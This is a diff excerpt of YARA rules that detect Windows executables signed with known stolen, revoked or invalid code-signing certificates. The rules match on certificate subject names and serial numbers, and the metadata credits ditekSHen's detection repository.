+		thumbprint = "21dacc55b6e0b3b0e761be03ed6edd713489b6ce"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "whatsupfuckers" and pe.signatures [ i ] . serial == "6b:ec:31:a0:a4:0d:2e:83:4e:51:ae:70:4e:1b:f9:d3" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC Mail.Ru" and pe.signatures [ i ] . serial == "0d:eb:00:4e:56:d7:fc:ec:1c:aa:8f:29:28:d4:e7:68" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_9Fac361Ee3304079 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_7Bd36898217B4Cc6B6427Dd7C361E43D : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "4143adb3-bd23-549c-b862-0db3583be161"
+		id = "ff5be4ad-9471-5d9f-a1ad-ed7aca345a7f"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6551-L6565"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1309-L1320"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a32fe70e2242e587007c3985420c3bea25d35aff37f62881cc386bdeff22ca93"
+		logic_hash = "9ff149b5a12e154c0ede5015a0432fb70d6001507356c006952e8db91afaa72d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2168032804def9cdbc1fc1a669377d494832f4ec"
+		thumbprint = "c55df31aa16adb1013612ceb1dcf587afb7832c3"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2021945 Ontario Inc." and ( pe.signatures [ i ] . serial == "9f:ac:36:1e:e3:30:40:79" or pe.signatures [ i ] . serial == "00:9f:ac:36:1e:e3:30:40:79" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aeafefcafbafbaf" and pe.signatures [ i ] . serial == "7b:d3:68:98:21:7b:4c:c6:b6:42:7d:d7:c3:61:e4:3d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_1895De749994D0Db : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_02D17Fbf4869F23Fea43C7863902Df93 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "2a8129ac-9838-5798-a115-ec03c1b3c205"
+		id = "6e96f5b2-f3de-5d5a-babe-d46b9e3edd3e"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6567-L6578"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1322-L1333"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0b5e7998bd6303a12a8681bca88b7802caa08d9272196b830ffac5573b6e3772"
+		logic_hash = "a66e10934cc58e364a694dde3865d0de33e61ce0128ef144c61fa5728d22b8f8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "069b9cb52a325a829aba7731ead939bc4ebf3743"
+		thumbprint = "d336ff8d8ccb771943a70bb4ba11239fb71beca5"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2021945 Ontario Inc." and pe.signatures [ i ] . serial == "18:95:de:74:99:94:d0:db" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Windows" and pe.signatures [ i ] . serial == "02:d1:7f:bf:48:69:f2:3f:ea:43:c7:86:39:02:df:93" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_28B691272719B1Ee : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_1E74Cfe7De8C5F57840A61034414Ca9F : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "5a8cf540-701f-5f94-b630-ccbaa62abfdd"
+		id = "b46992d5-f4fb-5e51-8f3c-eb87d4397f14"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6580-L6591"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1335-L1346"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b2224f8107e7c50334c7e12963e4e37c0a6824c49842afb314c12d6de9d6bc5e"
+		logic_hash = "14f57732a82b5139059bbe6f713184659187b57419d79e85a12ab197def4b761"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5dcbc94a2fdcc151afa8c55f24d0d5124d3b6134"
+		thumbprint = "2dfa711a12aed0ace72e538c57136fa021412f95951c319dcb331a3e529cf86e"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2021945 Ontario Inc." and pe.signatures [ i ] . serial == "28:b6:91:27:27:19:b1:ee" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Insta Software Solution Inc." and pe.signatures [ i ] . serial == "1e:74:cf:e7:de:8c:5f:57:84:0a:61:03:44:14:ca:9f" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00E3B80C0932B52A708477939B0D32186F : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_009272607Cfc982B782A5D36C4B78F5E7B : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "41525cdd-f65a-5aad-bd99-1cdcf8b11981"
+		id = "dfb01400-dff2-5df1-b38e-7eb2ee2c71b8"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6593-L6607"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1348-L1359"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a0a95c20c5c82b460ddef686731d1053181cb5066bbb4f585a4f402f50efe030"
+		logic_hash = "d1c2b44e782befc8dae6852935b6f5b0071c13dd9b56857c38cb290c9069df18"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1d2b5d4f0de1d7ce4abf82fdc58adc43bc28adee"
+		thumbprint = "2514c615fe54d511555bc5b57909874e48a438918a54cea4a0b3fbc401afa127"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BISOYETUTU LTD LIMITED" and ( pe.signatures [ i ] . serial == "e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" or pe.signatures [ i ] . serial == "00:e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rada SP Z o o" and pe.signatures [ i ] . serial == "00:92:72:60:7c:fc:98:2b:78:2a:5d:36:c4:b7:8f:5e:7b" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00C667Ffe3A5B0A5Ae7Cf3A9E41682E91B : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_7B91468122273Aa32B7Cfc80C331Ea13 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "509dcc22-1202-5b6e-a602-6b06c282b28d"
+		id = "4369d88d-f592-5a5a-bdf6-c63b77d45326"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6609-L6623"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1361-L1372"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6d3d0cfb42758f917b003f7979f7123c1789c9e9b4e01b1aebf265a298eac08f"
+		logic_hash = "4c0fa18edb23c6a7474185adc67101ad9b13c71188f25612165cb97d236562d8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6b66ba34ff01e0dab6e68ba244d991578a69c4ad"
+		thumbprint = "409f32dc91542546e7c7f85f687fe3f1acffdd853657c8aa8c1c985027f5271d"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NAILS UNLIMITED LIMITED" and ( pe.signatures [ i ] . serial == "c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" or pe.signatures [ i ] . serial == "00:c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO KBI" and pe.signatures [ i ] . serial == "7b:91:46:81:22:27:3a:a3:2b:7c:fc:80:c3:31:ea:13" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Sagsanlgs : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0082Cb93593B658100Cdd7A00C874287F2 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "b08e46a5-de76-5711-98dc-2144c7bbe66f"
+		id = "3e618656-6c9d-5172-bad4-f507cec1dc0c"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6639-L6650"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1374-L1385"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3ab10d8605f501f3c4f3a3afa31c5b001e03354846ff1953e7e36ceb9b564bf6"
+		logic_hash = "df8eb4feef3992bae7097a05860f57a1408fc79d92741e3ea2f202d072d9f47e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a6073f35adbdfe26ddc0f647953acc3a9bd33962"
+		thumbprint = "d168d7cf7add6001df83af1fc603a459e11395a9077579abcdfd708ad7b7271f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sagsanlgs" and pe.signatures [ i ] . serial == "00" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sportsonline24 B.V." and pe.signatures [ i ] . serial == "00:82:cb:93:59:3b:65:81:00:cd:d7:a0:0c:87:42:87:f2" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00989A33B72A2Aa29E32D0A5E155C53963 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Df683D46D8C3832489672Cc4E82D3D5D : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "59fcdc74-ca44-5d30-b9b0-5e9c7a3b50f3"
+		id = "532ee72a-00f6-513e-b4f9-0827f77d643e"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6668-L6682"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1387-L1398"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f016093cd512bcbf31814ff1619441e476b3988d0670f469f6311eda37ae295d"
+		logic_hash = "153fdb25769d912732a1fb4ecc757fc8c7e4766cd6588ea16d9cf642b4be8bf6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "3f53d410d2d959197f4a93d81a898f424941e11f"
+		thumbprint = "8b63c5ea8d9e4797d77574f35d1c2fdff650511264b12ce2818c46b19929095b"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TAKE CARE SP Z O O" and ( pe.signatures [ i ] . serial == "98:9a:33:b7:2a:2a:a2:9e:32:d0:a5:e1:55:c5:39:63" or pe.signatures [ i ] . serial == "00:98:9a:33:b7:2a:2a:a2:9e:32:d0:a5:e1:55:c5:39:63" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Osatokio Oy" and pe.signatures [ i ] . serial == "00:df:68:3d:46:d8:c3:83:24:89:67:2c:c4:e8:2d:3d:5d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00B8F726508Cf1D7B7913Bf4Bbd1E5C19C : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_105440F57E9D04419F5A3E72195110E6 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "0acaaed9-ba18-56b0-95b9-e05181843129"
+		id = "44600134-156b-5762-bdae-f4c016f454a3"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6684-L6698"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1400-L1411"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "71eb50a47465d69dbdd488c57b3fd9f70a4dd3b0bc086ed14038320928bc947e"
+		logic_hash = "f8b7aebe91466a587dac366cf6483586f22f95ebc186aa139e55c6e52d276f63"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0711adcedb225b82dc32c1435ff32d0a1e54911a"
+		thumbprint = "e95c7b4f2e5f64b388e968d0763da67014eb3aeb8c04bd44333ca3e151aa78c2"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TMerkuri LLC" and ( pe.signatures [ i ] . serial == "b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" or pe.signatures [ i ] . serial == "00:b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CRYPTOLAYER SRL" and pe.signatures [ i ] . serial == "10:54:40:f5:7e:9d:04:41:9f:5a:3e:72:19:51:10:e6" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0Aa099E64E214D655801Ea38Ad876711 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_C01E41Ff29078E6626A640C5A19A8D80 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "00b9cd1f-e389-51fd-8a08-73334bb0d0ef"
+		id = "93ee927f-71bd-5490-8f70-5486ee9c3b79"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6700-L6712"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1413-L1424"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a4211bc2f3cedb8b135566d4b22251523a3a2bbdb04c1f1c5b1336ae7c198773"
+		logic_hash = "1ee6f365d46fb1ee0e448fc0ab9d07c51a46f6ee95155094ec956f1cad6c1052"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0789b35fd5c2ef8142e6aae3b58fff14e4f13136"
-		hash1 = "9f90e6711618a1eab9147f90bdedd606fd975b785915ae37e50e7d2538682579"
+		thumbprint = "cca4a461592e6adff4e0a4458ebe29ee4de5f04c638dbd3b7ee30f3519cfd7e5"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Psiphon Inc." and pe.signatures [ i ] . serial == "0a:a0:99:e6:4e:21:4d:65:58:01:ea:38:ad:87:67:11" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BurnAware" and pe.signatures [ i ] . serial == "c0:1e:41:ff:29:07:8e:66:26:a6:40:c5:a1:9a:8d:80" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_54Cc50D147Fa549E3F721C754E4E3A91 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Fa3Dcac19B884B44Ef4F81541184D6B0 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "2007dabd-74c0-5cc7-986c-21fb1df9136a"
+		id = "a188e033-4381-5ff0-8f54-f36571ae7097"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6714-L6726"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1426-L1437"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "367237a9370542a4506fb13683f0a91e4bf5eb871e4b9f62b4cae8316bdf2d9a"
+		logic_hash = "7e9e2b22f6f2cfd5d7c962fb43c85d703d0a600f954f614073c708f4b881d90e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e3143f0df21fced02fe5525b297ed4cd389c66e3"
-		hash1 = "85adf569d259dc53c5099fea6e90ff3a614a406b4308ebdf9f40e8bed151f526"
+		thumbprint = "6557117e37296d7fdcac23f20b57e3d52cabdb8e5aa24d3b78536379d57845be"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ralink Technology Corporation" and pe.signatures [ i ] . serial == "54:cc:50:d1:47:fa:54:9e:3f:72:1c:75:4e:4e:3a:91" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unicom Ltd" and pe.signatures [ i ] . serial == "00:fa:3d:ca:c1:9b:88:4b:44:ef:4f:81:54:11:84:d6:b0" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_1E508Bb2398808Bc420A5A1F67Ba5D0B : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_70E1Ebd170Db8102D8C28E58392E5632 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "32f79595-6526-5dea-824a-cc073b6a2b5c"
+		id = "f5ccfbdd-d72d-5060-84e6-0ab8477f73fe"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6728-L6740"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1439-L1450"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "71b7efab5359408e3897498ce031c8375e2d67bfc8ff15c685df5ac6dd4bb015"
+		logic_hash = "b639424c97fb1da440c458cf5cb8f04562292284db7b576c0676a632704f597b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "63a3ca4114aef8d5076ec84ff78d2319d5305e5b"
-		hash1 = "7ff82a6621e0dd7c29c2e6bcd63920f9b58bc254df9479618b912a1e788ff18b"
+		thumbprint = "90d67006be03f2254e1da76d4ea7dc24372c4f30b652857890f9d9a391e9279c"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WakeNet AB" and pe.signatures [ i ] . serial == "1e:50:8b:b2:39:88:08:bc:42:0a:5a:1f:67:ba:5d:0b" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Equal Cash Technologies Limited" and pe.signatures [ i ] . serial == "70:e1:eb:d1:70:db:81:02:d8:c2:8e:58:39:2e:56:32" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_008B3333D32B2C2A1D33B41Ba5Db9D4D2D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_6Cfa5050C819C4Acbb8Fa75979688Dff : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "90947492-2f42-5d90-b635-62a5f7e79ffc"
+		id = "35673979-5578-5d32-b8f9-9e74f0c336a2"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6742-L6757"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1452-L1463"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c15a248dd52e7e888da381fda296cf19c53196ef52c4c4ce74af646d427eccde"
+		logic_hash = "e5978deb84a0c6cee9132f8806f239f33478462da31a423a04922c195cbd343a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7ecaa9a507a6672144a82d453413591067fc1d27"
-		hash1 = "5d5684ccef3ce3b6e92405f73794796e131d3cb1424d757828c3fb62f70f6227"
+		thumbprint = "e7241394097402bf9e32c87cada4ba5e0d1e9923f028683713c2f339f6f59fa9"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BOOK CAF\\xC3\\x89" and ( pe.signatures [ i ] . serial == "8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" or pe.signatures [ i ] . serial == "00:8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elite Web Development Ltd." and pe.signatures [ i ] . serial == "6c:fa:50:50:c8:19:c4:ac:bb:8f:a7:59:79:68:8d:ff" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_B548765Eebe9468348Af40B9891C1E63 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00B8164F7143E1A313003Ab0C834562F1F : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "0ee1a31b-6324-5dbd-bd0d-765bc4891415"
+		id = "d6ebdfb9-55db-58e2-89a8-d47d747e3432"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6759-L6771"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1465-L1476"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "db8136f63657130bb3fe2527bb597e70bc3d46395aa3137810f4ee4b4de6c6ec"
+		logic_hash = "77f8f125740de97e6fdd98103eefa2a431df0cbe2e7de44f7e863e22ebcfea4c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5987703bc4a3c739f92af8fed1747394880e1a39"
-		hash1 = "501dee454ba470aa09ceceb4c93ab7e9e913729e47fcc184a2e2d675f8234a58"
+		thumbprint = "263c636c5de68f0cd2adf31b7aebc18a5e00fc47a5e2124e2a5613b9a0247c1e"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OSIRIS Corporation" and pe.signatures [ i ] . serial == "b5:48:76:5e:eb:e9:46:83:48:af:40:b9:89:1c:1e:63" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ekitai Data Inc." and pe.signatures [ i ] . serial == "00:b8:16:4f:71:43:e1:a3:13:00:3a:b0:c8:34:56:2f:1f" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4697C7Ddd3E37Fe275Fdc6961A9093E3 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_E3C7Cc0950152E9Ceead4304D01F6C89 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "9d611fee-cf29-523e-86f7-5c67f0e563a9"
+		id = "8bea34fa-3620-5f5f-895f-3baa3b7b458a"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6773-L6785"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1478-L1489"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b3de1a753ac7a2f43ae64ee54fc81d92f70c32d4a04398a6dfc9a6ec856d8300"
+		logic_hash = "395ed4c9c8668f6416632f85883c5fd5b6038ce8388410f22bcbe2a9e6281c35"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ef24ae3635929c371d1427901082be9f76e58d9a"
-		hash1 = "fb3f622cf5557364a0a3abacc3e9acf399b3631bf3630acb8132514c486751e7"
+		thumbprint = "82975e3e21e8fd37bb723de6fdb6e18df9d0e55f0067cc77dd571a52025c6724"
 		importance = 20
 
 	condition:
